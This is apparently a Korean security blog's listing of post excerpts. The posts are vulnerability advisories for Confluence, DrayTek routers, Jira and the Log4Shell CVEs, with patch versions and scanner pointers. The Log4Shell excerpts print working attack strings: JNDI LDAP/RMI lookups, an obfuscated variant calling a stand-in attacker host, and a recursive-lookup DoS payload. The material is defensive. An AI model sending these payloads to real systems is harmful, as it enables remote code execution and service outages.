반응형

IT Security/Vulnerability 18

Atlassian 제품 보안 업데이트 권고 (CVE-2023-22527)

Atlassian 제품 보안 업데이트 권고 (CVE-2023-22527) * 최근 Atlassian 제품 관련 원격 명령 실행 취약점이 다수 탐지되고 있습니다. * 아래와 같은 Atlassian Confluence 제품취약 버전을 사용하는 곳은 업그레이드 권고드립니다. * KISA 보안 동향 : https://knvd.krcert.or.kr/detailSecNo.do?IDX=6076 보안 취약점 정보 포털 닫기 검색 knvd.krcert.or.kr * 벤더 공지 : https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluen..

취약점) DrayTek.Vigor.Router 취약점

DrayTek.Vigor.Router 취약점 - 대만 네트워크 장비 제조업체 DreyTek 장비 취약점. - 임의의 코드를 실행할 수 있는 취약점으로 성공 시 원격 공격자는 시스템에 코드 실행 및 권한 탈취를 할 수 있다. - 벤더사 권고버전 패치 필요 (v1.5.1) - 참고 페이지 : https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515) Linux..

취약점) CVE-2021-45105 PoC / Log4j2 취약점 테스트

CVE-2021-45105 PoC / Log4j2 취약점 테스트 CVE-2021-45105 공개 후 해당 취약점에 대한 PoC도 github에 공개되었습니다. 핵심 공격 구문은 ${${::-${::-$${::-$}}}} 입니다. 보안공지 및 기사를 확인했을때 공격자가 'X-Api-Version' 헤더에 특정 문자열(${${::-${::-$${::-$}}}})을 포함한 요청을 대상 서버에 전송하는 경우, log4j에서 로그를 저장하는 과정에서 StackOverFlow 오류를 발생시켜 해당 프로세스가 종료될 수 있다고 합니다. * PoC 테스트 (모바일 환경에서 이미지 확인이 어려울 수 있습니다) - 제공된 환경에서 테스트시 "Infinite loop in Property ....." 란 에러메시지를 출력합..

취약점) CVE-2021-45105 / Log4Shell 3번째 신규 취약점 발견

CVE-2021-45105 / Log4Shell 3번째 신규 취약점 발견 Log4Shell 관련 3번째 신규 취약점이 발견되었습니다. 3번째 취약점의 경우 2번째 발견된 취약점(CVE-2021-45046) 과 유사하게 Dos 공격을 유발한다고 합니다. * 취약점 설명 (벤더사 설명) 로깅 구성에서 컨텍스트 룩업이 포함된 패턴 레이아웃(예: ${ctx:loginId})을 사용하면 MDC(Thread Context Map) 입력 데이터를 제어하는 공격자가 재귀 룩업을 포함하는 악의적인 입력 데이터를 조작하여 프로세스를 종료할 수 있습니다. * 영향 받는 버전 2.0-beta9 ~ 2.16.0 버전 (Log4j 2.12.3 제외) * CVSS Score 7.5(AV:N/AC:L/PR:N/UI:N/S:U/C:N..

취약점) Log4Shell 취약점 점검 스캐너 - logpress (CVE-2021-44228 / CVE-2021-45046)

Log4Shell 취약점 스캐너 - logpress (CVE-2021-44228 / CVE-2021-45046) 최근 Log4Shell 취약점으로 인한 이슈가 많이 발생하고 있습니다. 지난 주말 최초 발견 후 Log4j2 패치 및 보안솔루션 대응을 하고 있지만 신규 취약점이 발생하였습니다. 최초 발견된 CVE-2021-44228 의 경우 2.15로 패치를 적용하면 문제가 없었으나 신규 발견된 CVE-2021-45046 의 경우 2.16로 패치를 적용해야합니다. 많은 분들이 이미 대응하셨지만 아직 대응하지 못하신 분들은 아래 취약점 점검 스캐너를 사용해보시면 좋을것 같습니다. LogPresso - Log4j2 취약점 점검 스캐너 - Window, Linux, Unix 환경에서 Log4j2 취약 버전 사용 ..

[긴급] 취약점) CVE-2021-45046 - Apache Log4j2 신규 취약점 발견 및 패치 배포 (21.12.15)

Apache Log4j2 신규 취약점 발견 (CVE-2021-45046) 출처 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 CVE - CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-def cve.mitre.or..

[긴급] 취약점) Apache Log4j 2 취약점 (CVE-2021-44228) PoC 및 취약점 스캐너

Apache Log4j 2 취약점 (CVE-2021-44228 / Log4Shell) PoC 및 취약점 스캐너 * 공격 구문 형식 - 주요 공격구문 : ${jndi:ldap://xxx.xxx.xxx/z} , ${jndi:rmi://xxx.xxx.xxx/z} - HTTP URL, Header, body에 삽입하여 다수 공격 시도 (Zgrab과 같은 취약점 스캐너를 이동한 자동화 공격) - 대소문자 및 아래와 같은 변형된 형식으로 인입도 가능. ex) ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z} - 출처 : https://github.com/Puliczek/..

[긴급] 취약점) Apache Log4j 2 취약점 (CVE-2021-44228)

Apache Log4j 2 취약점 (CVE-2021-44228) Apache Log4j 2 취약점 (CVE-2021-44228) 오픈소스 Apache Log4j2 원격 명령 실행 취약점이 발견되어 빠른 업데이트가 필요하다. Log4j의 경우 많은 사이트 및 프로그램에 적용된 유틸로 취약점 영향을 받는 대상이 많을 것으로 보인다. Log4j 란? log4j는 프로그램을 작성하는 도중에 로그를 남기기 위해 사용되는 자바 기반 로깅 유틸리티로 디버그용 도구로 주로 사용되고 있다. 취약점 대상 및 버전 Apache Log4j 2.0-beta9 ~ 2.14.1 모든버전 * Ahnlab 보안공지 출처 :https://asec.ahnlab.com/ko/29479/ Apache Log4j 2 취약점 주의 및 업데이트 ..

취약점) CVE-2019–11581 Jira 원격 코드 실행 취약점

취약점코드 CVE-2019–11581 Vendor Atlassian Jira Software 영향받는 버전 4.4.x 5.x.x 6.x.x 7.0.x, 7.1.x, 7.2.x, 7.3.x, 7.4.x, 7.5.x 7.6.x before 7.6.14 (the fixed version for 7.6.x) 7.7.x, 7.8.x, 7.9.x, 7.10.x, 7.11.x, 7.12.x 7.13.x before 7.13.5 (the fixed version for 7.13.x) 8.0.x before 8.0.3 (the fixed version for 8.0.x) 8.1.x before 8.1.2 (the fixed version for 8.1.x) 8.2.x before 8.2.3 (the fixed versi..

반응형